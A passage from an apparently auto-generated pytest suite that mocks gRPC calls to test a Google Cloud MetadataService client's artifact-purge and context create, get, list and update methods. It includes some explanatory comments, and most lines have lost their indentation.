call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.purge_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeArtifactsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_purge_artifacts_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
client.purge_artifacts()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeArtifactsRequest()
@pytest.mark.asyncio
async def test_purge_artifacts_async(
transport: str = "grpc_asyncio", request_type=metadata_service.PurgeArtifactsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.purge_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeArtifactsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_purge_artifacts_async_from_dict():
await test_purge_artifacts_async(request_type=dict)
def test_purge_artifacts_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeArtifactsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.purge_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_artifacts_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeArtifactsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.purge_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_purge_artifacts_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_artifacts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_purge_artifacts_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_artifacts(
metadata_service.PurgeArtifactsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_purge_artifacts_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_artifacts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_purge_artifacts_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_artifacts(
metadata_service.PurgeArtifactsRequest(),
parent="parent_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateContextRequest,
dict,
],
)
def test_create_context(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.create_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_create_context_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
client.create_context()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateContextRequest()
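
# NOTE (editorial sketch): the empty-call test above depends on the generated
# client substituting a default request when none is supplied -- roughly
# equivalent to the following (an approximation of the generated source):
#
#     if request is None:
#         request = metadata_service.CreateContextRequest()
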
@pytest.mark.asyncio
async def test_create_context_async(
transport: str = "grpc_asyncio", request_type=metadata_service.CreateContextRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.create_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_create_context_async_from_dict():
await test_create_context_async(request_type=dict)
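
# NOTE (editorial sketch): the *_from_dict variants work because proto-plus
# request messages accept a mapping in their constructor, so a plain dict is
# coerced into the request type before the transport is invoked. A minimal
# check of that assumption:
def test_create_context_request_accepts_dict():
    assert metadata_service.CreateContextRequest(
        {"parent": "parent_value"}
    ) == metadata_service.CreateContextRequest(parent="parent_value")
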
def test_create_context_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateContextRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
call.return_value = gca_context.Context()
client.create_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_context_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateContextRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gca_context.Context())
await client.create_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
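
# NOTE (editorial sketch): the ("x-goog-request-params", "parent=parent_value")
# pair asserted by the field-header tests is produced by google.api_core's
# routing-header helper (gapic_v1 is already used by the pager tests below).
# A minimal check of its shape:
def test_create_context_routing_header_shape():
    key, value = gapic_v1.routing_header.to_grpc_metadata(
        (("parent", "parent_value"),)
    )
    assert key == "x-goog-request-params"
    assert value == "parent=parent_value"
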
def test_create_context_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_context.Context()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_context(
parent="parent_value",
context=gca_context.Context(name="name_value"),
context_id="context_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].context
mock_val = gca_context.Context(name="name_value")
assert arg == mock_val
arg = args[0].context_id
mock_val = "context_id_value"
assert arg == mock_val
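
# NOTE (editorial sketch): flattened kwargs are a convenience spelling; they
# populate the same request message a caller could build explicitly. A
# minimal equivalence check under that assumption:
def test_create_context_flattened_equivalent_request():
    request = metadata_service.CreateContextRequest(
        parent="parent_value",
        context=gca_context.Context(name="name_value"),
        context_id="context_id_value",
    )
    assert request.parent == "parent_value"
    assert request.context.name == "name_value"
    assert request.context_id == "context_id_value"
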
def test_create_context_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_context(
metadata_service.CreateContextRequest(),
parent="parent_value",
context=gca_context.Context(name="name_value"),
context_id="context_id_value",
)
@pytest.mark.asyncio
async def test_create_context_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gca_context.Context())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_context(
parent="parent_value",
context=gca_context.Context(name="name_value"),
context_id="context_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].context
mock_val = gca_context.Context(name="name_value")
assert arg == mock_val
arg = args[0].context_id
mock_val = "context_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_context_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_context(
metadata_service.CreateContextRequest(),
parent="parent_value",
context=gca_context.Context(name="name_value"),
context_id="context_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetContextRequest,
dict,
],
)
def test_get_context(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.get_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_get_context_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
client.get_context()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetContextRequest()
@pytest.mark.asyncio
async def test_get_context_async(
transport: str = "grpc_asyncio", request_type=metadata_service.GetContextRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.get_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_context_async_from_dict():
await test_get_context_async(request_type=dict)
def test_get_context_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetContextRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
call.return_value = context.Context()
client.get_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_context_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetContextRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(context.Context())
await client.get_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_context_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = context.Context()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_context(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_context_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_context(
metadata_service.GetContextRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_context_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(context.Context())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_context(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_context_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_context(
metadata_service.GetContextRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListContextsRequest,
dict,
],
)
def test_list_contexts(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListContextsResponse(
next_page_token="next_page_token_value",
)
response = client.list_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListContextsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListContextsPager)
assert response.next_page_token == "next_page_token_value"
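
# NOTE (editorial sketch): the pager returned by list_contexts wraps the raw
# ListContextsResponse and forwards unknown attribute access to it, which is
# why next_page_token is readable directly on the pager above -- roughly:
#
#     def __getattr__(self, name):
#         return getattr(self._response, name)
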
def test_list_contexts_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
client.list_contexts()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListContextsRequest()
@pytest.mark.asyncio
async def test_list_contexts_async(
transport: str = "grpc_asyncio", request_type=metadata_service.ListContextsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListContextsResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListContextsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListContextsAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_contexts_async_from_dict():
await test_list_contexts_async(request_type=dict)
def test_list_contexts_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListContextsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
call.return_value = metadata_service.ListContextsResponse()
client.list_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_contexts_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListContextsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListContextsResponse()
)
await client.list_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_contexts_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListContextsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_contexts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_contexts_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_contexts(
metadata_service.ListContextsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_contexts_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            metadata_service.ListContextsResponse()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_contexts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_contexts_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_contexts(
metadata_service.ListContextsRequest(),
parent="parent_value",
)
def test_list_contexts_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
context.Context(),
],
next_page_token="abc",
),
metadata_service.ListContextsResponse(
contexts=[],
next_page_token="def",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
],
next_page_token="ghi",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
],
),
RuntimeError,
)
        metadata = (
            gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
        )
pager = client.list_contexts(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, context.Context) for i in results)
def test_list_contexts_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
context.Context(),
],
next_page_token="abc",
),
metadata_service.ListContextsResponse(
contexts=[],
next_page_token="def",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
],
next_page_token="ghi",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
],
),
RuntimeError,
)
pages = list(client.list_contexts(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
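
# NOTE (editorial sketch): pagination threads next_page_token from each
# response into page_token on the follow-up request, stopping on an empty
# token -- the generated pager's `pages` property is roughly:
#
#     response = method(request)
#     yield response
#     while response.next_page_token:
#         request.page_token = response.next_page_token
#         response = method(request)
#         yield response
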
@pytest.mark.asyncio
async def test_list_contexts_async_pager():
client = MetadataServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_contexts), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
context.Context(),
],
next_page_token="abc",
),
metadata_service.ListContextsResponse(
contexts=[],
next_page_token="def",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
],
next_page_token="ghi",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
],
),
RuntimeError,
)
async_pager = await client.list_contexts(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, context.Context) for i in responses)
@pytest.mark.asyncio
async def test_list_contexts_async_pages():
client = MetadataServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_contexts), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
context.Context(),
],
next_page_token="abc",
),
metadata_service.ListContextsResponse(
contexts=[],
next_page_token="def",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
],
next_page_token="ghi",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_contexts(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
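
# NOTE (editorial sketch): unlike the sync pager, the async pager is awaited
# once at construction, after which page and item iteration use `async for`.
# Assuming the generated AsyncPager surface, typical usage looks like:
#
#     async_pager = await client.list_contexts(request={})
#     async for page in async_pager.pages:
#         for ctx in page.contexts:
#             ...
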
@pytest.mark.parametrize(
"request_type",
[
metadata_service.UpdateContextRequest,
dict,
],
)
def test_update_context(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.update_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_update_context_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
